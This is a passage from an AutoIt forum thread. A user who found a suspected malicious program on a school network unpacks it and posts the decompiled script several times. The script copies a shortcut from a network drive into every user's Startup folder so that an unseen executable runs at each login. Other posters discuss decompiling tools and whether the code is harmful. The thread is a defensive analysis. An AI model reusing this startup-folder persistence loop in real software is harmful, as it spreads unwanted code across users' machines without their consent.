Sign in to follow this  
Followers 0
IAmABanana

Unpacking A Compiled Autoit .exe File?

19 posts in this topic

Hi,

I was wondering, is there a way to unpack a compiled autoit file?

I got infected with a weird autoit file somehow, and i guess its a keylogger.

it thats the case, then his email adress or FTP server adress should be in it.

I saw it was compiled with a (probably modified) UPX.

The origional file size was 118 Kb, and i already unpacked if half to 336 KB, and i can see half of the functions, but still not enough to get much info about what it does.

Soo, is there a way to open that script, and see its functions? or is there an unpacker that unpacks it correct?

Gr.

Share this post


Link to post
Share on other sites



HI,

Autoit itself delivers an unpacker. But maybe the exe was secured with a passoword.

Give it a try. :)

So long,

Mega


Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

HI,

Autoit itself delivers an unpacker. But maybe the exe was secured with a passoword.

Give it a try. :)

So long,

Mega

hmm.. i tryed that, and it says something like "this is not a compiled autoit script" or something like that.

but, it has a autoit icon, and it was named ai.exe, and its packed the same.

On a forum a saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile"

But, the link they gave to it is death. Does anyone here has that?

Share this post


Link to post
Share on other sites

#4 ·  Posted (edited)

hmm.. i tryed that, and it says something like "this is not a compiled autoit script" or something like that.

but, it has a autoit icon, and it was named ai.exe, and its packed the same.

On a forum a saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile"

But, the link they gave to it is death. Does anyone here has that?

HI,

as far as I know, there is a decompiler, but it runs only with old autoit.exe files. So, you won't get any further by getting the link.

So long,

Mega

Edited by th.meger

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

HI,

as far as I know, there is a decompiler, but it runs only with old autoit.exe files. So, you won't get any further by getting the link.

So long,

Mega

Hi,

I dumped the packer correct now :)

according the the data, its

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc:   0000h
Info:           VS_VERSION_INFO
Signature:     FEEF04BDh
Struc Version:   1.0
File Version:   3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:   
File OS:         WINDOWS32
File Type:     UNKNOWN
File SubType:   UNKNOWN
File Date:     00:00:00  00/00/0000

     Struc has Child(ren). Size: 348 bytes.

Child Type:      StringFileInfo
Language/Code Page: 2057/1200
Comments:          http://www.autoitscript.com/autoit3/compiled.html
FileDescription:    
FileVersion:        3, 1, 1, 0

Child Type:      VarFileInfo
Translation:        2057/1200

But, i still cant really see what it does, couse its spoiled with all kind of autoit functions, and i dont think it uses all of them.

look, http://img443.imageshack.us/img443/8476/look5vj.gif

this makes it kinda hard to actually see what it does.

any suggestions?

Share this post


Link to post
Share on other sites

Hi,

I dumped the packer correct now :)

according the the data, its

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc:   0000h
Info:           VS_VERSION_INFO
Signature:     FEEF04BDh
Struc Version:   1.0
File Version:   3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:   
File OS:         WINDOWS32
File Type:     UNKNOWN
File SubType:   UNKNOWN
File Date:     00:00:00  00/00/0000

     Struc has Child(ren). Size: 348 bytes.

Child Type:      StringFileInfo
Language/Code Page: 2057/1200
Comments:          http://www.autoitscript.com/autoit3/compiled.html
FileDescription:    
FileVersion:        3, 1, 1, 0

Child Type:      VarFileInfo
Translation:        2057/1200

But, i still cant really see what it does, couse its spoiled with all kind of autoit functions, and i dont think it uses all of them.

look, http://img443.imageshack.us/img443/8476/look5vj.gif

this makes it kinda hard to actually see what it does.

any suggestions?

you're going about it the wrong way. so you know. you should just get the newest UPX (it's free) and unpack it directly. then you'll have the source. (assuming it's not password protected) using a real time debugger like the one you're using, the only hope that you have is that the info you're looking for (e-mail or web address) may be in the referenced text strings, but not likely because of the way that the interpreter and source are just packaged together, and the code is not actually compiled in the typical sense.

1100111 00001011101111 00011101101111 00010111100100 00001111110100 00110111110010 00101101111001 0011100i didn't make up this form of encryption, but i like it.credit to the lvl 6 challenge on arcanum.co.nz

Share this post


Link to post
Share on other sites

#8 ·  Posted (edited)

post the script here and ill make a dump of the script.

if it is hostile i will post it here.

ok, here it is

edit: @cameronsdad, UPX 2.00D is the newest, infact, that cant unpack it. that says it not packed with UPX or give a 0000X0 error

upx125w tho can unpack it, but not to a autoit source, but a c++ compiled.exe (acourding to PEID)

autoit_thing.rar

Edited by IAmABanana

Share this post


Link to post
Share on other sites

Bump, and solved.

k, nvm, a friend sended me a modded unpacker. that just gets the code from the file itself, and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

Share this post


Link to post
Share on other sites

#10 ·  Posted

Bump, and solved.

k, nvm, a friend sended me a modded unpacker. that just gets the code from the file itself, and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------
ok... so it doesn't do anything.

1100111 00001011101111 00011101101111 00010111100100 00001111110100 00110111110010 00101101111001 0011100i didn't make up this form of encryption, but i like it.credit to the lvl 6 challenge on arcanum.co.nz

Share this post


Link to post
Share on other sites

#11 ·  Posted

ok... so it doesn't do anything.

well, actually, yes it does

C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten

would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

= startup folder

H:\link2.lnk is a shortcut to another virus like file...

Share this post


Link to post
Share on other sites

#12 ·  Posted

aww and i was just finsished eating :)

; <AUT2EXE VERSION: 3.1.1.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

FileChangeDir("C:\Documents and Settings")
; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then

    Else
        If $file = ".." Then
    Else
        FileCopy("H:\link2.lnk","C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten",1)
    EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------

My UDF's:;mem stuff_Mem;ftp stuff_FTP ( OLD );inet stuff_INetGetSource ( OLD )_INetGetImage _INetBrowse ( Collection )_EncodeUrl_NetStat_Google;random stuff_iPixelSearch_DiceRoll

Share this post


Link to post
Share on other sites

#13 ·  Posted

well, actually, yes it does

C:\Documents and Settings\"&$file&"\Menu Start\Programma's\Opstarten

would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

= startup folder

H:\link2.lnk is a shortcut to another virus like file...

what does that file do? the one that's linked to.

1100111 00001011101111 00011101101111 00010111100100 00001111110100 00110111110010 00101101111001 0011100i didn't make up this form of encryption, but i like it.credit to the lvl 6 challenge on arcanum.co.nz

Share this post


Link to post
Share on other sites

#14 ·  Posted

This doesnt really do much... Unless the H: drive was plugged to your computer. This code is harmless.

You cant copy a .lnk file from H if you dont have an H... most computers dont. I am assuming someone had a small utility that they didnt expect someone was going to use.

If you have excluded some information then please feel free to show me, but the above code is harmless. It wont even run when in AutoIt without an H drive.

Try harder next time,

JS


AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)

Share this post


Link to post
Share on other sites

#15 ·  Posted

This doesnt really do much... Unless the H: drive was plugged to your computer. This code is harmless.

You cant copy a .lnk file from H if you dont have an H... most computers dont. I am assuming someone had a small utility that they didnt expect someone was going to use.

If you have excluded some information then please feel free to show me, but the above code is harmless. It wont even run when in AutoIt without an H drive.

Try harder next time,

JS

that's how i saw it too, so was looking for more info when he said that it ran 'another virus like file'

1100111 00001011101111 00011101101111 00010111100100 00001111110100 00110111110010 00101101111001 0011100i didn't make up this form of encryption, but i like it.credit to the lvl 6 challenge on arcanum.co.nz

Share this post


Link to post
Share on other sites

#16 ·  Posted

that's how i saw it too, so was looking for more info when he said that it ran 'another virus like file'

To me its all hype...until he shows something more definite. Sure it "could" link to a virus, IF indeed you had an H: Drive it could copy that "bad" link from.

Too many variables to really be a virus infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H, and a short cut on it with that name and was able to also know that it went to something bad and just copied it to the start up folder of every available user.

Now again that is VERY unlikely :)

JS


AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)

Share this post


Link to post
Share on other sites

#17 ·  Posted

To me its all hype...until he shows something more definite. Sure it "could" link to a virus, IF indeed you had an H: Drive it could copy that "bad" link from.

Too many variables to really be a virus infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H, and a short cut on it with that name and was able to also know that it went to something bad and just copied it to the start up folder of every available user.

Now again that is VERY unlikely :)

JS

Well, couse you care so much,

Our school network was infected with this, and some other crap files...

when you login, your personal files we go to h:\(documents and settings)

so, this think first copyed itself from the startup folder to the startup folder of the user.

then, if the user logsin somewhere else, the file gets called from h:\documents and settings\startup, and copys itself to the c:\ startup

so if someone else logsin in that same computer, he also has it, and it he logs in somewhere else, that gets infected...

and all of a sudden the entire network has it...

what the .exe does the link2.ink is linkt to is not really important,

but now you see this think was part of a virus code (a noobie coded one, but still...)

Share this post


Link to post
Share on other sites

#18 ·  Posted

Well, couse you care so much,

Our school network was infected with this, and some other crap files...

when you login, your personal files we go to h:\(documents and settings)

so, this think first copyed itself from the startup folder to the startup folder of the user.

then, if the user logsin somewhere else, the file gets called from h:\documents and settings\startup, and copys itself to the c:\ startup

so if someone else logsin in that same computer, he also has it, and it he logs in somewhere else, that gets infected...

and all of a sudden the entire network has it...

what the .exe does the link2.ink is linkt to is not really important,

but now you see this think was part of a virus code (a noobie coded one, but still...)

Now you have extended us the courtesy of which you should have passed along in the first place. What the EXE does in the .lnk is the virus not this code. This code just ensures that the .exe will run no matter where you are.

Apparently it is someone in your school that knows a bit of AutoIt that created this script to copy that link to that EXE.

This file isnt an infection. If you have had any troubles it will be from the .EXE that the shortcut points to. After all that is the final destination of this script is to make sure that runs!

Again I state. The above script that has been shown to us is in no way harmful. It may be a nuisance, but you should have precautions that would keep these things from happening.

If the EXE isnt anything bad then there is nothing malicious about this program.

JS


AutoIt Links

File-String Hash Plugin Updated! 04-02-2008 Plugins have been discontinued. I just found out.

ComputerGetInfo UDF's Updated! 11-23-2006

External Links

Vortex Revolutions Engineer / Inventor (Web, Desktop, and Mobile Applications, Hardware Gizmos, Consulting, and more)

Share this post


Link to post
Share on other sites

#19 ·  Posted

C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

Sounds Dutch to me ...

You want me to stop by and teach them a lesson ? ( and that won't be in AutoIt3) . :)

Now the question in my mind is: how is it possible to create a shortcut to a virus that is always available to everybody in the School network and will automatically be run? That would require some sort of elevated access to a server I assume.

Nice challenge these school networks :(


Visit the SciTE4AutoIt3 Download page for the latest versions        Beta files                                                          Forum Rules
 
Live for the present,
Dream of the future,
Learn from the past.
  :)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0